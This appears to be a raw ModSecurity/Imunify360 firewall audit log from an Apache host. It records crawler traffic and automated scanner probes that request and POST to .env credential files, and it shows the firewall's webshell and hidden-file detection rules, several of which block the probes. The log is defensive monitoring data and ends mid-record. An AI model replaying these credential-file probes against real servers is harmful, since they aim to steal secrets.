Server: Apache Engine-Mode: "ENABLED" --28504940-Z-- --10609816-A-- [30/Jun/2025:16:33:09.340089 +0530] aGJu7Z4tZwI9VhjyFFR7cAAAAEI 20.171.207.232 33346 192.168.74.40 443 --10609816-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/hotels-bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --10609816-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --10609816-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/hotels-bikaner.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/hotels-bikaner.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281389321974 18411 (- - -) Stopwatch2: 1751281389321974 18411; combined=3337, p1=170, p2=2984, p3=0, p4=0, p5=183, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --649e5464-Z-- --cc876b23-A-- [30/Jun/2025:16:33:10.915579 +0530] aGJu7oU2EnuyYp1xkG2bQAAAAD4 192.253.209.66 32271 192.168.74.40 443 --cc876b23-B-- POST /.env.project%20 HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --cc876b23-C-- 0x%5B%5D=DTAB --cc876b23-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --cc876b23-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281390792113 124034 (- - -) Stopwatch2: 1751281390792113 124034; combined=9865, p1=164, p2=9297, p3=0, p4=0, p5=404, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --cc876b23-Z-- --61b90647-A-- [30/Jun/2025:16:33:11.721028 +0530] aGJu754tZwI9VhjyFFR7cgAAAEI 20.171.207.232 33346 192.168.74.40 443 --61b90647-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Dances.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --61b90647-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --61b90647-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Dances.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Dances.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --61b90647-Z-- --05f3864f-A-- [30/Jun/2025:16:33:12.570909 +0530] aGJu8N-HxfD8hNXwBpyI_AAAAGE 192.253.209.104 22295 192.168.74.40 443 --05f3864f-B-- GET /.env.dist HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --05f3864f-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --05f3864f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281392522978 48270 (- - -) Stopwatch2: 1751281392522978 48270; combined=5605, p1=154, p2=5265, p3=0, p4=0, p5=185, sr=197, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --05f3864f-Z-- --736bfe1b-A-- [30/Jun/2025:16:33:12.883871 +0530] aGJu8J4tZwI9VhjyFFR7cwAAAEI 20.171.207.232 33346 192.168.74.40 443 --736bfe1b-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/Alwar-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --736bfe1b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --736bfe1b-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/Alwar-City-Guide.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/Alwar-City-Guide.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281392864834 19277 (- - -) Stopwatch2: 1751281392864834 19277; combined=4202, p1=198, p2=3832, p3=0, p4=0, p5=172, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --736bfe1b-Z-- --4abaf02c-A-- [30/Jun/2025:16:33:13.954418 +0530] aGJu8X2nhEobhD5c29xrVwAAAFo 192.253.209.88 10273 192.168.74.40 443 --4abaf02c-B-- POST /.env.dist HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --4abaf02c-C-- 0x%5B%5D=DTAB --4abaf02c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --4abaf02c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281393827082 127784 (- - -) Stopwatch2: 1751281393827082 127784; combined=9961, p1=179, p2=9411, p3=0, p4=0, p5=370, sr=49, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4abaf02c-Z-- --11f8f669-A-- [30/Jun/2025:16:33:14.056074 +0530] aGJu8Rt271fKIIafbmUlhwAAAF8 43.154.140.188 38536 192.168.74.40 80 --11f8f669-B-- GET / HTTP/1.1 Host: infivislifecare.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --11f8f669-F-- HTTP/1.1 200 OK Last-Modified: Fri, 27 Sep 2024 11:37:35 GMT Accept-Ranges: bytes Content-Length: 49730 Connection: close -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --11f8f669-Z-- --53876e25-A-- [30/Jun/2025:16:33:15.114112 +0530] aGJu8_nNXpEUjiJVIlRmlAAAADo 192.253.209.62 21573 192.168.74.40 443 --53876e25-B-- GET /back/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --53876e25-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --53876e25-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281395047891 66917 (- - -) Stopwatch2: 1751281395047891 66917; combined=1129, p1=74, p2=792, p3=0, p4=0, p5=262, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --53876e25-Z-- --3dc68d48-A-- [30/Jun/2025:16:33:16.075130 +0530] aGJu8jSFvs-H_7nBXVD84QAAAEo 198.98.57.237 39569 192.168.74.40 443 --3dc68d48-B-- GET /wp-login.php HTTP/1.1 Host: mail.novemsol.com Connection: keep-alive Accept-Encoding: none Accept: */* user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36 --3dc68d48-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: PHPSESSID=70d87f52993bfe3473d49c0c72ce9eba; path=/ Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3dc68d48-Z-- --4f6c325f-A-- [30/Jun/2025:16:33:16.562968 +0530] aGJu9H2nhEobhD5c29xrWAAAAFo 192.253.209.103 52875 192.168.74.40 443 --4f6c325f-B-- POST /back/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --4f6c325f-C-- 0x%5B%5D=DTAB --4f6c325f-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --4f6c325f-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281396484855 78511 (- - -) Stopwatch2: 1751281396484855 78511; combined=2078, p1=165, p2=1643, p3=0, p4=0, p5=270, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4f6c325f-Z-- --8b6cd545-A-- [30/Jun/2025:16:33:17.016415 +0530] aGJu9PnNXpEUjiJVIlRmlQAAADo 57.141.0.10 35598 192.168.74.40 443 --8b6cd545-B-- GET /rajasthan-tours-from-udaipur/rajasthan-tours-from-agra/rajasthan-tours-from-agra/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-jodhpur/rajasthan-tours-from-delhi/images/Rajasthan-Travel-Guides/Car-Rentals-Ahmedabad.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --8b6cd545-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8b6cd545-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-udaipur/rajasthan-tours-from-agra/rajasthan-tours-from-agra/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-jodhpur/rajasthan-tours-from-delhi/images/Rajasthan-Travel-Guides/Car-Rentals-Ahmedabad.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a77f3508-Z-- --7d1d4667-A-- [30/Jun/2025:16:33:18.183811 +0530] aGJu9ir_VjbCfxeXLc8cDQAAAE8 192.253.209.77 36939 192.168.74.40 443 --7d1d4667-B-- GET /core/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --7d1d4667-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --7d1d4667-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281398142392 41586 (- - -) Stopwatch2: 1751281398142392 41586; combined=955, p1=113, p2=641, p3=0, p4=0, p5=200, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --7d1d4667-Z-- --1a03e819-A-- [30/Jun/2025:16:33:18.918516 +0530] aGJu9p4tZwI9VhjyFFR7eAAAAEI 20.171.207.232 33346 192.168.74.40 443 --1a03e819-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/payment-mode.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --1a03e819-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1a03e819-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/payment-mode.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/payment-mode.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281398901303 17497 (- - -) Stopwatch2: 1751281398901303 17497; combined=4295, p1=164, p2=3950, p3=0, p4=0, p5=180, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1a03e819-Z-- --1975d726-A-- [30/Jun/2025:16:33:19.603192 +0530] aGJu98AWx2r4bH3u7WHhNgAAAGM 192.253.209.56 21969 192.168.74.40 443 --1975d726-B-- POST /core/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --1975d726-C-- 0x%5B%5D=DTAB --1975d726-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --1975d726-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281399531093 73859 (- - -) Stopwatch2: 1751281399531093 73859; combined=1864, p1=149, p2=1373, p3=0, p4=0, p5=342, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1975d726-Z-- --6748784a-A-- [30/Jun/2025:16:33:20.069354 +0530] aGJu-J4tZwI9VhjyFFR7eQAAAEI 20.171.207.232 33346 192.168.74.40 443 --6748784a-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --6748784a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6748784a-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --6748784a-Z-- --03c0a136-A-- [30/Jun/2025:16:33:20.777514 +0530] aGJu-Cr_VjbCfxeXLc8cDgAAAE8 192.253.209.58 41051 192.168.74.40 443 --03c0a136-B-- GET /docker/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --03c0a136-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --03c0a136-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281400737368 40570 (- - -) Stopwatch2: 1751281400737368 40570; combined=941, p1=96, p2=689, p3=0, p4=0, p5=156, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --03c0a136-Z-- --645cf616-A-- [30/Jun/2025:16:33:20.869229 +0530] aGJu-Bt271fKIIafbmUligAAAF8 57.141.0.29 55820 192.168.74.40 443 --645cf616-B-- GET /rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --645cf616-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --645cf616-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281400851986 17398 (- - -) Stopwatch2: 1751281400851986 17398; combined=4294, p1=193, p2=3957, p3=0, p4=0, p5=143, sr=62, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4fff0f6b-Z-- --ec0d354a-A-- [30/Jun/2025:16:33:22.311247 +0530] aGJu-mDWKeIK7PdN9mdsngAAAEU 192.253.209.77 48513 192.168.74.40 443 --ec0d354a-B-- POST /docker/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 